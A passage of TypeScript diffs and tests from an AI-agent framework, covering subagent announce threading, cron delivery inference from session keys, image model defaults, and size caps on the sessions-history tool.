embeddedRunMock.isEmbeddedPiRunStreaming.mockReturnValue(false);
sessionStore = {
"agent:main:main": {
sessionId: "session-thread",
lastChannel: "telegram",
lastTo: "telegram:123",
lastThreadId: 42,
queueMode: "collect",
queueDebounceMs: 0,
},
};
const didAnnounce = await runSubagentAnnounceFlow({
childSessionKey: "agent:main:subagent:test",
childRunId: "run-thread",
requesterSessionKey: "main",
requesterDisplayKey: "main",
task: "do thing",
timeoutMs: 1000,
cleanup: "keep",
waitForCompletion: false,
startedAt: 10,
endedAt: 20,
outcome: { status: "ok" },
});
expect(didAnnounce).toBe(true);
await expect.poll(() => agentSpy.mock.calls.length).toBe(1);
const call = agentSpy.mock.calls[0]?.[0] as { params?: Record<string, unknown> };
expect(call?.params?.channel).toBe("telegram");
expect(call?.params?.to).toBe("telegram:123");
expect(call?.params?.threadId).toBe("42");
});
it("prefers requesterOrigin.threadId over session entry threadId", async () => {
const { runSubagentAnnounceFlow } = await import("./subagent-announce.js");
embeddedRunMock.isEmbeddedPiRunActive.mockReturnValue(true);
embeddedRunMock.isEmbeddedPiRunStreaming.mockReturnValue(false);
sessionStore = {
"agent:main:main": {
sessionId: "session-thread-override",
lastChannel: "telegram",
lastTo: "telegram:123",
lastThreadId: 42,
queueMode: "collect",
queueDebounceMs: 0,
},
};
const didAnnounce = await runSubagentAnnounceFlow({
childSessionKey: "agent:main:subagent:test",
childRunId: "run-thread-override",
requesterSessionKey: "main",
requesterDisplayKey: "main",
requesterOrigin: {
channel: "telegram",
to: "telegram:123",
threadId: 99,
},
task: "do thing",
timeoutMs: 1000,
cleanup: "keep",
waitForCompletion: false,
startedAt: 10,
endedAt: 20,
outcome: { status: "ok" },
});
expect(didAnnounce).toBe(true);
await expect.poll(() => agentSpy.mock.calls.length).toBe(1);
const call = agentSpy.mock.calls[0]?.[0] as { params?: Record<string, unknown> };
expect(call?.params?.threadId).toBe("99");
});
it("splits collect-mode queues when accountId differs", async () => {
const { runSubagentAnnounceFlow } = await import("./subagent-announce.js");
embeddedRunMock.isEmbeddedPiRunActive.mockReturnValue(true);

View File

@@ -233,4 +233,97 @@ describe("cron tool", () => {
expect(call.method).toBe("cron.add");
expect(call.params?.agentId).toBeNull();
});
it("infers delivery from threaded session keys", async () => {
callGatewayMock.mockResolvedValueOnce({ ok: true });
const tool = createCronTool({
agentSessionKey: "agent:main:slack:channel:general:thread:1699999999.0001",
});
await tool.execute("call-thread", {
action: "add",
job: {
name: "reminder",
schedule: { at: new Date(123).toISOString() },
payload: { kind: "agentTurn", message: "hello" },
},
});
const call = callGatewayMock.mock.calls[0]?.[0] as {
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
};
expect(call?.params?.delivery).toEqual({
mode: "announce",
channel: "slack",
to: "general",
});
});
it("preserves telegram forum topics when inferring delivery", async () => {
callGatewayMock.mockResolvedValueOnce({ ok: true });
const tool = createCronTool({
agentSessionKey: "agent:main:telegram:group:-1001234567890:topic:99",
});
await tool.execute("call-telegram-topic", {
action: "add",
job: {
name: "reminder",
schedule: { at: new Date(123).toISOString() },
payload: { kind: "agentTurn", message: "hello" },
},
});
const call = callGatewayMock.mock.calls[0]?.[0] as {
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
};
expect(call?.params?.delivery).toEqual({
mode: "announce",
channel: "telegram",
to: "-1001234567890:topic:99",
});
});
it("infers delivery when delivery is null", async () => {
callGatewayMock.mockResolvedValueOnce({ ok: true });
const tool = createCronTool({ agentSessionKey: "agent:main:dm:alice" });
await tool.execute("call-null-delivery", {
action: "add",
job: {
name: "reminder",
schedule: { at: new Date(123).toISOString() },
payload: { kind: "agentTurn", message: "hello" },
delivery: null,
},
});
const call = callGatewayMock.mock.calls[0]?.[0] as {
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
};
expect(call?.params?.delivery).toEqual({
mode: "announce",
to: "alice",
});
});
it("does not infer delivery when mode is none", async () => {
callGatewayMock.mockResolvedValueOnce({ ok: true });
const tool = createCronTool({ agentSessionKey: "agent:main:discord:dm:buddy" });
await tool.execute("call-none", {
action: "add",
job: {
name: "reminder",
schedule: { at: new Date(123).toISOString() },
payload: { kind: "agentTurn", message: "hello" },
delivery: { mode: "none" },
},
});
const call = callGatewayMock.mock.calls[0]?.[0] as {
params?: { delivery?: { mode?: string; channel?: string; to?: string } };
};
expect(call?.params?.delivery).toEqual({ mode: "none" });
});
});

View File

@@ -1,6 +1,8 @@
import { Type } from "@sinclair/typebox";
import type { CronDelivery, CronMessageChannel } from "../../cron/types.js";
import { loadConfig } from "../../config/config.js";
import { normalizeCronJobCreate, normalizeCronJobPatch } from "../../cron/normalize.js";
import { parseAgentSessionKey } from "../../sessions/session-key-utils.js";
import { truncateUtf16Safe } from "../../utils.js";
import { resolveSessionAgentId } from "../agent-scope.js";
import { optionalStringEnum, stringEnum } from "../schema/typebox.js";
@@ -153,6 +155,72 @@ async function buildReminderContextLines(params: {
}
}
function isRecord(value: unknown): value is Record<string, unknown> {
return typeof value === "object" && value !== null && !Array.isArray(value);
}
function stripThreadSuffixFromSessionKey(sessionKey: string): string {
const normalized = sessionKey.toLowerCase();
const idx = normalized.lastIndexOf(":thread:");
if (idx <= 0) {
return sessionKey;
}
const parent = sessionKey.slice(0, idx).trim();
return parent ? parent : sessionKey;
}
function inferDeliveryFromSessionKey(agentSessionKey?: string): CronDelivery | null {
const rawSessionKey = agentSessionKey?.trim();
if (!rawSessionKey) {
return null;
}
const parsed = parseAgentSessionKey(stripThreadSuffixFromSessionKey(rawSessionKey));
if (!parsed || !parsed.rest) {
return null;
}
const parts = parsed.rest.split(":").filter(Boolean);
if (parts.length === 0) {
return null;
}
const head = parts[0]?.trim().toLowerCase();
if (!head || head === "main" || head === "subagent" || head === "acp") {
return null;
}
// buildAgentPeerSessionKey encodes peers as:
// - dm:<peerId>
// - <channel>:dm:<peerId>
// - <channel>:<accountId>:dm:<peerId>
// - <channel>:group:<peerId>
// - <channel>:channel:<peerId>
// Threaded sessions append :thread:<id>, which we strip so delivery targets the parent peer.
// NOTE: Telegram forum topics encode as <chatId>:topic:<topicId> and should be preserved.
const markerIndex = parts.findIndex(
(part) => part === "dm" || part === "group" || part === "channel",
);
if (markerIndex === -1) {
return null;
}
const peerId = parts
.slice(markerIndex + 1)
.join(":")
.trim();
if (!peerId) {
return null;
}
let channel: CronMessageChannel | undefined;
if (markerIndex >= 1) {
channel = parts[0]?.trim().toLowerCase() as CronMessageChannel;
}
const delivery: CronDelivery = { mode: "announce", to: peerId };
if (channel) {
delivery.channel = channel;
}
return delivery;
}
export function createCronTool(opts?: CronToolOptions): AnyAgentTool {
return {
label: "Cron",
@@ -243,6 +311,35 @@ Use jobId as the canonical identifier; id is accepted for compatibility. Use con
(job as { agentId?: string }).agentId = agentId;
}
}
// [Fix Issue 3] Infer delivery target from session key for isolated jobs if not provided
if (
opts?.agentSessionKey &&
job &&
typeof job === "object" &&
"payload" in job &&
(job as { payload?: { kind?: string } }).payload?.kind === "agentTurn"
) {
const deliveryValue = (job as { delivery?: unknown }).delivery;
const delivery = isRecord(deliveryValue) ? deliveryValue : undefined;
const modeRaw = typeof delivery?.mode === "string" ? delivery.mode : "";
const mode = modeRaw.trim().toLowerCase();
const hasTarget =
(typeof delivery?.channel === "string" && delivery.channel.trim()) ||
(typeof delivery?.to === "string" && delivery.to.trim());
const shouldInfer =
(deliveryValue == null || delivery) && mode !== "none" && !hasTarget;
if (shouldInfer) {
const inferred = inferDeliveryFromSessionKey(opts.agentSessionKey);
if (inferred) {
(job as { delivery?: unknown }).delivery = {
...delivery,
...inferred,
} satisfies CronDelivery;
}
}
}
const contextMessages =
typeof params.contextMessages === "number" && Number.isFinite(params.contextMessages)
? params.contextMessages

View File

@@ -24,6 +24,8 @@ import {
} from "./image-tool.helpers.js";
const DEFAULT_PROMPT = "Describe the image.";
const ANTHROPIC_IMAGE_PRIMARY = "anthropic/claude-opus-4-6";
const ANTHROPIC_IMAGE_FALLBACK = "anthropic/claude-opus-4-5";
export const __testing = {
decodeDataUrl,
@@ -117,7 +119,7 @@ export function resolveImageModelConfigForTool(params: {
} else if (primary.provider === "openai" && openaiOk) {
preferred = "openai/gpt-5-mini";
} else if (primary.provider === "anthropic" && anthropicOk) {
preferred = "anthropic/claude-opus-4-5";
preferred = ANTHROPIC_IMAGE_PRIMARY;
}
if (preferred?.trim()) {
@@ -125,7 +127,7 @@ export function resolveImageModelConfigForTool(params: {
addFallback("openai/gpt-5-mini");
}
if (anthropicOk) {
addFallback("anthropic/claude-opus-4-5");
addFallback(ANTHROPIC_IMAGE_FALLBACK);
}
// Don't duplicate primary in fallbacks.
const pruned = fallbacks.filter((ref) => ref !== preferred);
@@ -138,7 +140,7 @@ export function resolveImageModelConfigForTool(params: {
// Cross-provider fallback when we can't pair with the primary provider.
if (openaiOk) {
if (anthropicOk) {
addFallback("anthropic/claude-opus-4-5");
addFallback(ANTHROPIC_IMAGE_FALLBACK);
}
return {
primary: "openai/gpt-5-mini",
@@ -146,7 +148,10 @@ export function resolveImageModelConfigForTool(params: {
};
}
if (anthropicOk) {
return { primary: "anthropic/claude-opus-4-5" };
return {
primary: ANTHROPIC_IMAGE_PRIMARY,
fallbacks: [ANTHROPIC_IMAGE_FALLBACK],
};
}
return null;

View File

@@ -2,7 +2,9 @@ import { Type } from "@sinclair/typebox";
import type { AnyAgentTool } from "./common.js";
import { loadConfig } from "../../config/config.js";
import { callGateway } from "../../gateway/call.js";
import { capArrayByJsonBytes } from "../../gateway/session-utils.fs.js";
import { isSubagentSessionKey, resolveAgentIdFromSessionKey } from "../../routing/session-key.js";
import { truncateUtf16Safe } from "../../utils.js";
import { jsonResult, readStringParam } from "./common.js";
import {
createAgentToAgentPolicy,
@@ -19,6 +21,131 @@ const SessionsHistoryToolSchema = Type.Object({
includeTools: Type.Optional(Type.Boolean()),
});
const SESSIONS_HISTORY_MAX_BYTES = 80 * 1024;
const SESSIONS_HISTORY_TEXT_MAX_CHARS = 4000;
function truncateHistoryText(text: string): { text: string; truncated: boolean } {
if (text.length <= SESSIONS_HISTORY_TEXT_MAX_CHARS) {
return { text, truncated: false };
}
const cut = truncateUtf16Safe(text, SESSIONS_HISTORY_TEXT_MAX_CHARS);
return { text: `${cut}\n…(truncated)…`, truncated: true };
}
function sanitizeHistoryContentBlock(block: unknown): { block: unknown; truncated: boolean } {
if (!block || typeof block !== "object") {
return { block, truncated: false };
}
const entry = { ...(block as Record<string, unknown>) };
let truncated = false;
const type = typeof entry.type === "string" ? entry.type : "";
if (typeof entry.text === "string") {
const res = truncateHistoryText(entry.text);
entry.text = res.text;
truncated ||= res.truncated;
}
if (type === "thinking") {
if (typeof entry.thinking === "string") {
const res = truncateHistoryText(entry.thinking);
entry.thinking = res.text;
truncated ||= res.truncated;
}
// The encrypted signature can be extremely large and is not useful for history recall.
if ("thinkingSignature" in entry) {
delete entry.thinkingSignature;
truncated = true;
}
}
if (typeof entry.partialJson === "string") {
const res = truncateHistoryText(entry.partialJson);
entry.partialJson = res.text;
truncated ||= res.truncated;
}
if (type === "image") {
const data = typeof entry.data === "string" ? entry.data : undefined;
const bytes = data ? data.length : undefined;
if ("data" in entry) {
delete entry.data;
truncated = true;
}
entry.omitted = true;
if (bytes !== undefined) {
entry.bytes = bytes;
}
}
return { block: entry, truncated };
}
function sanitizeHistoryMessage(message: unknown): { message: unknown; truncated: boolean } {
if (!message || typeof message !== "object") {
return { message, truncated: false };
}
const entry = { ...(message as Record<string, unknown>) };
let truncated = false;
// Tool result details often contain very large nested payloads.
if ("details" in entry) {
delete entry.details;
truncated = true;
}
if ("usage" in entry) {
delete entry.usage;
truncated = true;
}
if ("cost" in entry) {
delete entry.cost;
truncated = true;
}
if (typeof entry.content === "string") {
const res = truncateHistoryText(entry.content);
entry.content = res.text;
truncated ||= res.truncated;
} else if (Array.isArray(entry.content)) {
const updated = entry.content.map((block) => sanitizeHistoryContentBlock(block));
entry.content = updated.map((item) => item.block);
truncated ||= updated.some((item) => item.truncated);
}
if (typeof entry.text === "string") {
const res = truncateHistoryText(entry.text);
entry.text = res.text;
truncated ||= res.truncated;
}
return { message: entry, truncated };
}
function jsonUtf8Bytes(value: unknown): number {
try {
return Buffer.byteLength(JSON.stringify(value), "utf8");
} catch {
return Buffer.byteLength(String(value), "utf8");
}
}
function enforceSessionsHistoryHardCap(params: {
items: unknown[];
bytes: number;
maxBytes: number;
}): { items: unknown[]; bytes: number; hardCapped: boolean } {
if (params.bytes <= params.maxBytes) {
return { items: params.items, bytes: params.bytes, hardCapped: false };
}
const last = params.items.at(-1);
const lastOnly = last ? [last] : [];
const lastBytes = jsonUtf8Bytes(lastOnly);
if (lastBytes <= params.maxBytes) {
return { items: lastOnly, bytes: lastBytes, hardCapped: true };
}
const placeholder = [
{
role: "assistant",
content: "[sessions_history omitted: message too large]",
},
];
return { items: placeholder, bytes: jsonUtf8Bytes(placeholder), hardCapped: true };
}
function resolveSandboxSessionToolsVisibility(cfg: ReturnType<typeof loadConfig>) {
return cfg.agents?.defaults?.sandbox?.sessionToolsVisibility ?? "spawned";
}
@@ -131,10 +258,26 @@ export function createSessionsHistoryTool(opts?: {
params: { sessionKey: resolvedKey, limit },
});
const rawMessages = Array.isArray(result?.messages) ? result.messages : [];
const messages = includeTools ? rawMessages : stripToolMessages(rawMessages);
const selectedMessages = includeTools ? rawMessages : stripToolMessages(rawMessages);
const sanitizedMessages = selectedMessages.map((message) => sanitizeHistoryMessage(message));
const contentTruncated = sanitizedMessages.some((entry) => entry.truncated);
const cappedMessages = capArrayByJsonBytes(
sanitizedMessages.map((entry) => entry.message),
SESSIONS_HISTORY_MAX_BYTES,
);
const droppedMessages = cappedMessages.items.length < selectedMessages.length;
const hardened = enforceSessionsHistoryHardCap({
items: cappedMessages.items,
bytes: cappedMessages.bytes,
maxBytes: SESSIONS_HISTORY_MAX_BYTES,
});
return jsonResult({
sessionKey: displayKey,
messages,
messages: hardened.items,
truncated: droppedMessages || contentTruncated || hardened.hardCapped,
droppedMessages: droppedMessages || hardened.hardCapped,
contentTruncated,
bytes: hardened.bytes,
});
},
};

View File

@@ -231,6 +231,10 @@ export function createSessionsSpawnTool(opts?: {
message: task,
sessionKey: childSessionKey,
channel: requesterOrigin?.channel,
to: requesterOrigin?.to ?? undefined,
accountId: requesterOrigin?.accountId ?? undefined,
threadId:
requesterOrigin?.threadId != null ? String(requesterOrigin.threadId) : undefined,
idempotencyKey: childIdem,
deliver: false,
lane: AGENT_LANE_SUBAGENT,